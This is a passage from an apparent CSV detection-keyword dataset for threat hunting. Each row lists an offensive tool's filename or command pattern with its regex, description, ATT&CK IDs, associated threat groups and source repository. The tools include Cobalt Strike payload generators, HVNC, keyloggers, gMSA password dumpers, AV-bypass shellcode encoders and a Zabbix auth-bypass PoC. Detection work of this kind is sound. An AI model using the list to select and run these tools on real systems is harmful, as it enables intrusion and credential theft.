which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*github.com/rossja/TinyNuke*",".{0,1000}github\.com\/rossja\/TinyNuke.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*github.com/SafeJKA/Kidlogger*",".{0,1000}github\.com\/SafeJKA\/Kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*github.com/sensepost*",".{0,1000}github\.com\/sensepost.{0,1000}","offensive_tool_keyword","Github 
Username","github repo of orange cyberdefense red team","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sensepost","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/SpiderLabs/*",".{0,1000}github\.com\/SpiderLabs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*github.io/weakpass/generator/*",".{0,1000}github\.io\/weakpass\/generator\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - 
TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*GithubC2-main*",".{0,1000}GithubC2\-main.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*gitleaks detect*",".{0,1000}gitleaks\sdetect.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*gitleaks*",".{0,1000}gitleaks.{0,1000}","offensive_tool_keyword","Gitleaks","Gitleaks is a SAST tool for detecting hardcoded secrets like passwords. api keys. and tokens in git repos. Gitleaks aims to be the easy-to-use. all-in-one solution for finding secrets. past or present. 
in your code.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/zricethezav/gitleaks","1","1","N/A","N/A","10","15280","1313","2024-04-29T18:46:16Z","2018-01-27T18:19:31Z" "*Git-Scanner*",".{0,1000}Git\-Scanner.{0,1000}","offensive_tool_keyword","Git-Scanner","A tool for bug hunting or pentesting for targeting websites that have open .git repositories available in public","T1213 - T1596 - T1190 - T1590","TA0007 - TA0009 - TA0001","N/A","N/A","Information Gathering","https://github.com/HightechSec/git-scanner","1","1","N/A","N/A","4","332","89","2020-06-23T05:44:26Z","2020-05-17T14:30:19Z" "*GIUDA* -askluids*",".{0,1000}GIUDA.{0,1000}\s\-askluids.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","5","450","65","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*GIUDA-main.zip*",".{0,1000}GIUDA\-main\.zip.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","1","N/A","9","5","450","65","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*give_dcsync.py*",".{0,1000}give_dcsync\.py.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*glassfish_war_upload_xsrf*",".{0,1000}glassfish_war_upload_xsrf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*glebarez/padre*",".{0,1000}glebarez\/padre.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*glit org -*",".{0,1000}glit\sorg\s\-.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit repo *",".{0,1000}glit\srepo\s.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit user *",".{0,1000}glit\suser\s.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit.exe org*",".{0,1000}glit\.exe\sorg.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit.exe repo*",".{0,1000}glit\.exe\srepo.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit.exe user*",".{0,1000}glit\.exe\suser.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit-i686-pc-windows-msvc*",".{0,1000}glit\-i686\-pc\-windows\-msvc.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit-main.zip*",".{0,1000}glit\-main\.zip.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit-x86_64-apple-darwin*",".{0,1000}glit\-x86_64\-apple\-darwin.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit-x86_64-pc-windows-msvc*",".{0,1000}glit\-x86_64\-pc\-windows\-msvc.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit-x86_64-unknown-linux-gnu*",".{0,1000}glit\-x86_64\-unknown\-linux\-gnu.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*globaleaks/Tor2web*",".{0,1000}globaleaks\/Tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*gloxec/CrossC2*",".{0,1000}gloxec\/CrossC2.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*gloxec/CrossC2*",".{0,1000}gloxec\/CrossC2.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*GmailC2.csproj*",".{0,1000}GmailC2\.csproj.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*gmsa_dump*",".{0,1000}gmsa_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*gMSADumper.py*",".{0,1000}gMSADumper\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of 
offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gMSADumper.py*",".{0,1000}gMSADumper\.py.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","3","224","40","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z" "*GMSAPasswordReader.exe*",".{0,1000}GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","160","29","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" "*GMSAPasswordReader-master*",".{0,1000}GMSAPasswordReader\-master.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","160","29","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" "*GMShellcode*",".{0,1000}GMShellcode.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential 
Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*GMShellcode.*",".{0,1000}GMShellcode\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*GMShellcode\*",".{0,1000}GMShellcode\\.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*go build Ivy.go*",".{0,1000}go\sbuild\sIvy\.go.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*go get -u *traitor/cmd/traitor*",".{0,1000}go\sget\s\-u\s.{0,1000}traitor\/cmd\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*go run cmd/chaos/main.go*",".{0,1000}go\srun\scmd\/chaos\/main\.go.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allows generating binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*go run poc.go check -t http://*:8080 -u Admin*",".{0,1000}go\srun\spoc\.go\scheck\s\-t\shttp\:\/\/.{0,1000}\:8080\s\-u\sAdmin.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","0","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" "*go run scannerPort.go*",".{0,1000}go\srun\sscannerPort\.go.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","0","N/A","N/A","1","79","20","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" "*go thru each line in passwords.lst*",".{0,1000}go\sthru\seach\sline\sin\spasswords\.lst.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential 
Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*Go, go ADeleginator!*",".{0,1000}Go,\sgo\sADeleginator!.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*go.flipt.io/reverst/*",".{0,1000}go\.flipt\.io\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*go_shellcode_encode.py*",".{0,1000}go_shellcode_encode\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "*gobfuscate*",".{0,1000}gobfuscate.{0,1000}","offensive_tool_keyword","gobfuscate","When you compile a Go binary. it contains a lot of information about your source code: field names. strings. package paths. etc. If you want to ship a binary without leaking this kind of information. what are you to do? With gobfuscate. you can compile a Go binary from obfuscated source code. This makes a lot of information difficult or impossible to decipher from the binary.","T1027 - T1029 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/unixpickle/gobfuscate","1","0","N/A","N/A","10","1410","160","2021-12-07T22:27:26Z","2016-10-01T20:40:37Z" "*gobuster dir *",".{0,1000}gobuster\sdir\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster dir -w *",".{0,1000}gobuster\sdir\s\-w\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gobuster dns*",".{0,1000}gobuster\sdns.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation 
Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster fuzz -*",".{0,1000}gobuster\sfuzz\s\-.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster gcs *",".{0,1000}gobuster\sgcs\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster s3 *",".{0,1000}gobuster\ss3\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster tftp *",".{0,1000}gobuster\stftp\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster vhost -u *",".{0,1000}gobuster\svhost\s\-u\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - 
TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster vhost*",".{0,1000}gobuster\svhost.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster*",".{0,1000}gobuster.{0,1000}","offensive_tool_keyword","gobuster","Gobuster is a tool used to brute-force","T1110 - T1114 - T1115 - T1107","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster_*.tar.gz*",".{0,1000}gobuster_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster_*.zip*",".{0,1000}gobuster_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobusterfuzz*",".{0,1000}gobusterfuzz.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation 
